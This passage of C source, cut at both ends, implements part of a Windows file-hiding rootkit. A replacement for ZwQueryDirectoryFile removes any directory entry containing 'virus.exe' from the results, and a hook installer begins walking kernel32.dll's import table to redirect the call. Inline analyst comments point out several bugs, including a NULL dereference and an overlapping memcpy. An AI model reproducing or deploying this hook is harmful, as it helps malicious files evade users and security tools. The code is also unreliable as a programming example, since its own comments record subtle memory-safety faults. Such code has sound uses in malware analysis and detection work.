IN BOOLEAN ReturnSingleEntry, IN PUNICODE_STRING FileName OPTIONAL, IN BOOLEAN RestartScan ); /* tail of the ZWQUERYDIRECTORYFILE function-pointer typedef that begins before this chunk */

// Address of the original ZwQueryDirectoryFile. Presumably filled in by the
// hook installer below before the import entry is redirected -- the assignment
// is not visible in this chunk, so confirm against HookQueryFile.
ZWQUERYDIRECTORYFILE OldZwQueryDirectoryFile = NULL;

//////////////////////////////////////////////////////////////////////////
// Replacement for the original function
//////////////////////////////////////////////////////////////////////////
/*
 * Hook body for ZwQueryDirectoryFile.
 *
 * Forwards every call to the saved original, then -- only for the
 * FileBothDirectoryInformation class -- walks the returned entry list and
 * splices out any entry whose name contains "virus.exe", so that the caller
 * never sees it.  All other information classes pass through untouched.
 *
 * Parameters/return: identical to ZwQueryDirectoryFile; the NTSTATUS of the
 * original call is returned unchanged.
 *
 * Analyst notes (behaviour as written, not fixed here):
 *  - NT_SUCCESS() is also true for STATUS_PENDING, so on an asynchronous
 *    call (Event/ApcRoutine supplied) the buffer is inspected before the
 *    I/O has completed.
 *  - Only one filter string, compiled in, and matched with wcsstr() as a
 *    substring -- any name containing "virus.exe" is removed.
 *  - Pointer arithmetic goes through ULONG casts: 32-bit process only.
 */
NTSTATUS WINAPI NewZwQueryDirectoryFile(HANDLE FileHandle,HANDLE Event,PIO_APC_ROUTINE ApcRoutine,PVOID ApcContext,PIO_STATUS_BLOCK IoStatusBlock,PVOID FileInformation,ULONG Length,FILE_INFORMATION_CLASS FileInformationClass,BOOLEAN ReturnSingleEntry,PUNICODE_STRING FileName,BOOLEAN RestartScan)
{
    // Call the original function first; the result buffer is edited in place afterwards.
    LONG rret = OldZwQueryDirectoryFile(FileHandle,Event,ApcRoutine,ApcContext,IoStatusBlock,FileInformation,Length,FileInformationClass,ReturnSingleEntry,FileName,RestartScan);
    if (!NT_SUCCESS(rret))
    {
        return rret;
    }
    // Only the FileBothDirectoryInformation case is handled; other classes are returned as-is.
    if (FileInformationClass==FileBothDirectoryInformation)
    {
        PFILE_BOTH_DIRECTORY_INFORMATION pFileInfo;      // entry currently being examined
        PFILE_BOTH_DIRECTORY_INFORMATION pLastFileInfo;  // previous kept entry (NULL until one is kept)
        // Test target: hiding virus.exe under C:\ (name is compiled in).
        WCHAR VIRUS[] = L"virus.exe";
        BOOLEAN flag;                                    // TRUE when pFileInfo is the last entry (NextEntryOffset == 0)
        pFileInfo = (PFILE_BOTH_DIRECTORY_INFORMATION)FileInformation;
        pLastFileInfo = NULL;
        do
        {
            flag = !( pFileInfo->NextEntryOffset );
            // Wide-char comparison; wcsstr used for now.
            // NOTE: FileName here is a counted buffer (FileNameLength, in bytes), not
            // guaranteed NUL-terminated; wcsstr() ignores the length and may scan past the name.
            if(wcsstr(pFileInfo->FileName,VIRUS)!=NULL)
            {
                if(flag)
                {
                    // Matching entry is the last one: terminate the list at the previous entry.
                    // pLastFileInfo is still NULL if this is also the first entry (single-entry
                    // result), so this write dereferences NULL in that case.
                    pLastFileInfo->NextEntryOffset = 0;
                    break;
                }
                else
                {
                    // Matching entry is in the middle: shift everything after it down over it.
                    // iLeft = bytes from the next entry to the end of the caller's buffer (Length).
                    int iPos = ((ULONG)pFileInfo) - (ULONG)FileInformation;
                    int iLeft = (DWORD)Length - iPos - pFileInfo->NextEntryOffset;
                    // Source and destination overlap here (memmove semantics are what is needed).
                    memcpy( (PVOID)pFileInfo, (PVOID)( (char *)pFileInfo + pFileInfo->NextEntryOffset ), (DWORD)iLeft );
                    // Re-examine the same slot, which now holds the following entry.
                    continue;
                }
            }
            pLastFileInfo = pFileInfo;
            pFileInfo = (PFILE_BOTH_DIRECTORY_INFORMATION)((char *)pFileInfo + pFileInfo->NextEntryOffset);
        }while(!flag);
    }
    return rret;
}

//////////////////////////////////////////////////////////////////////////
// Hook Function
//////////////////////////////////////////////////////////////////////////
/*
 * Installs (or, judging by the flag parameter, removes -- confirm in the
 * remainder of the function) the ZwQueryDirectoryFile hook.  Walks the PE
 * headers of kernel32.dll toward its import directory; the rest of the body
 * continues past the end of this chunk.
 *
 * Returns FALSE on any header validation failure.
 */
BOOL HookQueryFile(BOOL flag)
{
    // Determine the base address of kernel32.dll.
    HMODULE hModule = 
LoadLibrary("kernel32.dll"); if (hModule==NULL) { return FALSE; } PIMAGE_DOS_HEADER pDosHdr = (PIMAGE_DOS_HEADER)hModule; if (pDosHdr->e_magic!=IMAGE_DOS_SIGNATURE) { return FALSE; } PIMAGE_NT_HEADERS pNtHdr = (PIMAGE_NT_HEADERS)((ULONG)hModule+pDosHdr->e_lfanew); if (pNtHdr->Signature!=IMAGE_NT_SIGNATURE) { return FALSE; } if (pNtHdr->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress==NULL || pNtHdr->O |